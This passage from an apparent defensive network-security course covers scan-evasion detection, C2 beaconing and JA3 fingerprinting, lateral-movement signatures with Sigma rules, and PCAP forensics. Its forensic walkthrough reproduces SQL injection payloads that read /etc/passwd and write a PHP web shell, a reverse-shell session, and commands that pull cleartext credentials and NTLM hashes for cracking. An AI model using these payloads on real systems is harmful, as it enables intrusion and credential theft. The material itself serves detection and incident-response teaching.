Decoy scanning	`-D decoy1,decoy2`	Spoofs source IP — scan appears to come from multiple hosts	Real source still in the set; all "sources" send SYNs to exactly the same ports at the same time — impossible for uncoordinated hosts
Source port spoofing	`--source-port 53`	Sets source port to 53 — some firewalls trust DNS replies	Responses to port 53 source go to DNS port — SYN/ACK from host to port 53 with no prior DNS query is anomalous
Randomised order	`--randomize-hosts`	Scans targets in random order	Still produces characteristic SYN pattern; NetFlow analysis shows the full picture regardless of order

Key Takeaways — Chapter 7

SYN scan sends one SYN and reads the response: SYN/ACK = open, RST/ACK = closed, no response = filtered — the TCP state machine determines port status, not the application
OS fingerprinting compares TCP/IP stack behaviours (TTL, window size, TCP options) against a database — the values are set by the OS kernel and are difficult to spoof without breaking connectivity
Scan evasion reduces the signal for rate-based detection but doesn't eliminate the scan's characteristic pattern — sequential port access, consistent SYN timing ratios, and decoy anomalies all survive evasion
Passive fingerprinting (p0f) identifies OS from normal traffic with zero packets sent — useful for inventory and anomaly detection without active scanning
NetFlow/IPFIX data is the most reliable scan detection source — it shows connection attempts across the entire network regardless of whether individual hosts log them

Chapter 08 · ~12 min Protocol Depth

Covert Channels and C2 Traffic

DNS and ICMP tunnelling mechanics, HTTP/S C2 traffic patterns, JA3/JA3S TLS fingerprinting, domain fronting, beaconing detection, and Cobalt Strike malleable profiles

Command and control infrastructure is the nervous system of a post-exploitation engagement. Once an attacker has code execution on a host, they need a communication channel back to their infrastructure. The challenge for the attacker is making that channel blend into legitimate traffic — and the challenge for defenders is finding the pattern that distinguishes C2 from legitimate communications despite the blending effort.

HTTP/S C2 — What It Looks Like

Modern C2 frameworks (Cobalt Strike, Sliver, Havoc) communicate over HTTPS because HTTPS traffic is nearly universally permitted and the encryption prevents content inspection. The distinguishing characteristics of C2 traffic are not in the content — they are in the metadata: timing, frequency, size patterns, and certificate details.

C2 Beaconing DetectionComparing legitimate HTTPS traffic to Cobalt Strike default beacon

Legitimate HTTPS traffic (user browsing): Connection timing: Irregular — driven by user actions Request sizes: Variable (20 bytes to 50KB depending on page) Response sizes: Variable (HTML, CSS, JS, images) Connections per hr: Bursty — active browsing then quiet User-Agent: Consistent per browser, changes on update TLS cert subject: Matches domain, trusted CA, recent issuance Cobalt Strike default beacon (60-second interval, no jitter): Connection timing: Every 60.0 seconds ± 0.1s ← machine precision Request sizes: ~200-300 bytes (check-in, no tasking) Response sizes: ~100 bytes (no task) / large (task delivered) Connections per hr: Exactly 60 ← not human User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1) ← IE9 on Windows 7, common Cobalt Strike default Destination IP: May not match cert CN (domain fronting) Mature Cobalt Strike with malleable profile + jitter: Connection timing: 60s ± 30% random jitter ← harder to detect User-Agent: Matches current Chrome on Windows 11 Request/Response: Padded to variable sizes, injected into HTTP headers JA3 fingerprint: Still detectable if C2 uses non-standard TLS config

JA3/JA3S — TLS Fingerprinting

JA3 creates a fingerprint of TLS ClientHello messages — the combination of TLS version, cipher suites, extensions, elliptic curves, and elliptic curve point formats produces a hash that identifies the TLS implementation, not just the content. C2 frameworks have characteristic JA3 hashes that differ from browser TLS stacks even when the User-Agent is spoofed.

JA3 Fingerprint Calculation

TLS ClientHello fields used in JA3: SSLVersion: 771 (TLS 1.2) Ciphers: 49196,49200,49195,49199,52393,52392,... (list of supported ciphers) Extensions: 65281,0,23,35,13,5,18,16,... (list of extensions) EllipticCurves: 29,23,24 EllipticCurvePointFormats: 0 JA3 = MD5("771,49196-49200-...,65281-0-...,29-23-24,0") Chrome 110 JA3: e7d705a3286e19ea42f587b344ee6865 CS default JA3: 72a589da586844d7f0818ce684948eea ← known bad hash JA3S fingerprints the ServerHello — identifies the server TLS implementation JA3 + JA3S pair identifies both client and server — powerful for C2 infra detection Detection: maintain JA3 blocklist of known C2 framework hashes Tools: Zeek ja3 plugin, Suricata ja3 rules, Arkime (Moloch)

Beaconing Detection — Statistical Analysis

Sigma RuleC2 Beaconing — Periodic Connection to External Host

title: Potential C2 Beaconing — Regular Periodic Connections description: Detects hosts making highly regular outbound connections # This rule logic requires statistical analysis across a time window # Best implemented in SIEM with aggregation and stddev calculation detection: selection: EventID: 3 # Sysmon network connection Initiated: 'true' DestinationPort: - 443 - 80 timeframe: 1h condition: # Same source → dest with stddev(interval) < 5 seconds # and count > 10 connections in window | count() by src_ip, dst_ip > 10 falsepositives: - NTP-style background services - Software update checks (reduce noise by allowlisting known update domains) level: medium

Key Takeaways — Chapter 8

C2 beaconing is detectable via timing regularity — machine-precision intervals with low standard deviation are not produced by human-driven traffic
JA3 fingerprints the TLS ClientHello fields — C2 frameworks have characteristic JA3 hashes that differ from browser implementations even when User-Agent is spoofed
DNS tunnelling produces high-entropy, long subdomains at high query rates — statistical analysis detects it; content inspection doesn't help because the data is in the labels
Malleable C2 profiles add jitter and pad request/response sizes — detection shifts from absolute values to statistical patterns (low stddev relative to mean interval)
Domain fronting uses a legitimate CDN's TLS certificate while routing to attacker infrastructure — JA3S fingerprinting of the CDN vs the actual backend can surface this mismatch

Chapter 09 · ~11 min Protocol Depth

Lateral Movement at the Network Level

What lateral movement looks like as network traffic, WMI/SMB/WinRM/RDP signatures, NetFlow as a detection source, Sigma rules for movement detection, and the challenge of legitimate protocol abuse

The Penetration Testing module covers lateral movement tools and commands. This chapter covers what those tools produce on the wire and in logs — because defenders detecting lateral movement rarely see the tool output, they see Event IDs, NetFlow records, and proxy logs. Understanding the network signature of each technique is what allows defenders to write detection logic that fires on the behaviour regardless of which specific tool is used.

Lateral Movement Technique Network Signatures

Technique	Protocol / Port	Network Signature	Event IDs
PsExec / SMB exec	SMB 445/tcp	SMB connection; IPC$ share access; service creation; ADMIN$ share write (uploads binary)	4624 (Type 3), 7045 (new service), 5140 (share access)
WMI remote exec	RPC 135/tcp + dynamic high ports	Initial RPC on 135, then random high port negotiation; DCOM traffic pattern	4624 (Type 3), 4688 (process create on target), Sysmon 1
WinRM / PowerShell remoting	5985/tcp (HTTP) or 5986/tcp (HTTPS)	HTTP to port 5985; WSMan protocol; large base64-encoded payloads in HTTP body	4624 (Type 3), PowerShell 4103/4104 (script block logging)
Pass-the-Hash SMB	SMB 445/tcp	NTLM authentication (not Kerberos) from unexpected source; unusual time for the account	4624 (Type 3, NTLM, no prior 4768)
RDP	3389/tcp	RDP connection; large data transfer (screen bitmap); keyboard/mouse events pattern	4624 (Type 10 = RemoteInteractive), 4778 (reconnect)
DCOM lateral movement	RPC dynamic	DCOM activation requests; MMC20 or ShellWindows COM object instantiation	4624 (Type 3), 4688, Sysmon 8/10 (remote thread/process access)

Pass-the-Hash vs Legitimate Authentication — The Detection Signal

Pass-the-Hash Traffic Signature vs Legitimate Kerberos Login

Legitimate domain login (Kerberos): Workstation ─── AS-REQ ──────────────────────────────► DC:88 DC ─── AS-REP (TGT) ────────────────────────► Workstation Workstation ─── TGS-REQ (request service ticket) ───► DC:88 DC ─── TGS-REP (service ticket) ────────────► Workstation Workstation ─── SMB/AP-REQ (Kerberos auth) ──────────► Target:445 Event 4624: LogonType=3, AuthPackage=Kerberos, preceded by 4768+4769 ──────────────────────────────────────────────────── Pass-the-Hash (NTLM, no Kerberos): No Kerberos traffic to DC — attacker has hash, not TGT Workstation ─── SMB NEGOTIATE ───────────────────────► Target:445 Workstation ─── NTLM NEGOTIATE ──────────────────────► Target:445 Target ─── NTLM CHALLENGE ──────────────────────► Workstation Workstation ─── NTLM AUTHENTICATE ───────────────────► Target:445 Event 4624: LogonType=3, AuthPackage=NTLM — NO preceding 4768/4769 Detection: NTLM auth from workstation to server with no prior Kerberos request

Sigma RuleLateral Movement — PsExec Pattern (New Service on Remote Host)

title: PsExec-Style Lateral Movement — Remote Service Creation description: Service created with random name matching common lateral movement tools detection: selection: EventID: 7045 # New service installed ServiceFileName|contains: - 'ADMIN$' - - '%TEMP%' ServiceType: 'User Mode Service' selection_name: EventID: 7045 ServiceName|re: '^[A-Za-z0-9]{5,8}$' # random short name condition: selection or selection_name falsepositives: - Legitimate software installers (refine with known good service names) level: high

Key Takeaways — Chapter 9

Pass-the-Hash produces NTLM authentication to port 445 without any preceding Kerberos traffic to the DC — the absence of Event IDs 4768/4769 is as significant as the presence of 4624
PsExec's signature is a service creation (Event ID 7045) with a random name and a binary path under ADMIN$ — this pattern is consistent regardless of which tool executes it
WinRM/PowerShell remoting generates HTTP connections on port 5985 with large base64 payloads — script block logging (Event ID 4104) is essential for seeing what was executed
NetFlow data sees all lateral movement attempts regardless of whether the target host logs them — it's the detection source least affected by an attacker who has compromised endpoint logging
The challenge of lateral movement detection is that it uses legitimate protocols (SMB, WMI, RDP) — detection requires behavioural baselines (who normally connects to what) not just signature matching

Chapter 10 · ~11 min Protocol Depth

Network Forensics and Attack Reconstruction

Reconstructing an attack chain from PCAP, tshark forensic techniques, extracting credentials and files from captures, building the network timeline, and corroborating endpoint forensics

Network forensics answers questions that endpoint forensics cannot. An attacker who clears Windows event logs, deletes PowerShell history, and removes tools from disk has eliminated most endpoint evidence. The network traffic — if captured — is outside their control. PCAP and NetFlow data captured on network infrastructure tells the story of what happened regardless of what the attacker did to the endpoints they touched.

The Network Forensics Toolkit

Tool	Purpose	Best For
Wireshark	Interactive PCAP analysis, stream following, protocol dissection	Manual investigation, credential extraction, protocol-specific analysis
tshark	CLI Wireshark — scriptable, pipeline-friendly	Automated analysis, large PCAP processing, field extraction
Zeek	Network traffic analysis framework — generates structured logs from PCAP	Turning raw PCAP into queryable logs (conn.log, dns.log, http.log, ssl.log)
NetworkMiner	Passive network sniffer and forensic analyser	Extracting files, images, and credentials from PCAP automatically
Arkime (Moloch)	Full-packet capture storage and search platform	Enterprise-scale PCAP with indexed search and JA3 integration

Reconstructing an Attack from PCAP

tshark — Attack Reconstruction WorkflowExtracting the attack timeline from a network capture

Step 1: Get an overview — all unique conversations $ tshark -r incident.pcap -q -z conv,tcp | head -30 10.10.10.99:49234 → 10.10.10.5:80 720 pkts 3.2 MB (web traffic) 10.10.10.99:49301 → 10.10.10.5:4444 1842 pkts 890 KB ← unusual port! 10.10.10.5:49415 → 10.10.10.50:445 342 pkts 87 KB (SMB — lateral?) Step 2: Find the initial compromise — what happened on port 80 first? $ tshark -r incident.pcap -Y "ip.src==10.10.10.99 && tcp.dstport==80" -T fields -e http.request.uri /products?id=1 /products?id=1 UNION SELECT 1,2,3-- /products?id=-1 UNION SELECT user(),version(),@@datadir-- /products?id=-1 UNION SELECT 1,2,load_file('/etc/passwd')-- /products?id=-1 UNION SELECT "<?php system($_GET['c']);?>",2,3 INTO OUTFILE '/var/www/html/sh.php'-- Step 3: Follow the reverse shell on port 4444 $ tshark -r incident.pcap -Y "tcp.port==4444" -z follow,tcp,ascii,0 www-data@webserver01:/var/www/html$ id uid=33(www-data) gid=33(www-data) www-data@webserver01:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@webserver01:/var/www/html$ cat /etc/passwd Step 4: Identify lateral movement — SMB connection to 10.10.10.50 $ tshark -r incident.pcap -Y "ip.src==10.10.10.5 && tcp.dstport==445" -T fields -e smb.path -e smb.cmd \\10.10.10.50\ADMIN$ (SMB write — uploaded executable) \\10.10.10.50\IPC$ (remote service creation via SVCCTL) Attack timeline reconstructed from PCAP alone: 14:23:11 SQLi reconnaissance begins 14:24:02 SQLi exploitation — web shell written 14:24:18 Reverse shell connection established (port 4444) 14:26:44 Privilege escalation (inferred from shell commands) 14:31:15 Lateral movement to 10.10.10.50 via SMB

Extracting Credentials from Captures

tshark + NetworkMinerExtracting credentials from unencrypted protocols in PCAP

Extract HTTP Basic Auth credentials: $ tshark -r incident.pcap -Y "http.authorization" -T fields -e ip.src -e http.authorization 10.10.10.20 Basic YWRtaW46UGFzc3dvcmQxMjM= $ echo "YWRtaW46UGFzc3dvcmQxMjM=" | base64 -d admin:Password123 Extract FTP credentials (cleartext): $ tshark -r incident.pcap -Y "ftp.request.command == USER || ftp.request.command == PASS" -T fields -e ftp.request.arg svc-backup Backup2023! Extract NTLM hashes for offline cracking: $ tshark -r incident.pcap -Y "ntlmssp.messagetype == 3" -T fields -e ntlmssp.auth.username -e ntlmssp.auth.domain john.smith ACME # Full NTLMv2 response extractable for hashcat -m 5600 Extract transferred files (NetworkMiner): NetworkMiner → Files tab → all files transferred via HTTP, SMB, FTP reconstructed Includes: malware dropped, documents exfiltrated, scripts executed

Network Evidence Limitations

Network forensics is powerful but has structural limitations that investigations must account for:

Encryption — TLS-encrypted traffic (HTTPS, SMB3 with encryption, RDP) cannot be decrypted without the server's private key. You can see the connection happened, the timing, and the data volumes, but not the content.
Capture points — you can only analyse traffic that passed through a capture point (SPAN port, TAP, firewall log). East-west traffic on the same switch segment may not have been captured.
Storage limitations — full PCAP at scale is expensive. Most organisations retain NetFlow data (connection metadata, no payload) for longer periods than full PCAP. NetFlow shows who connected to whom; PCAP shows what was said.
Timestamps — network timestamps are only as reliable as the clock synchronisation of the capture device. NTP skew between capture devices can misalign the timeline by seconds to minutes.

Key Takeaways — Chapter 10

Network PCAP is outside the attacker's control after the fact — it tells the story of what happened even when endpoint evidence has been destroyed
tshark's -z follow,tcp,ascii reconstructs full TCP streams — interactive shell sessions, file transfers, and protocol exchanges are readable from PCAP
Credentials in unencrypted protocols (HTTP Basic Auth, FTP, Telnet) are extractable directly from PCAP with one-line tshark commands
Zeek converts raw PCAP into structured logs (conn.log, dns.log, http.log, ssl.log) that are queryable like a database — essential for large-scale network forensics
NetFlow shows who connected to whom even without full PCAP — it is the minimum viable network forensics artifact and should be retained for at least 90 days on all network segments

Network AttackDetection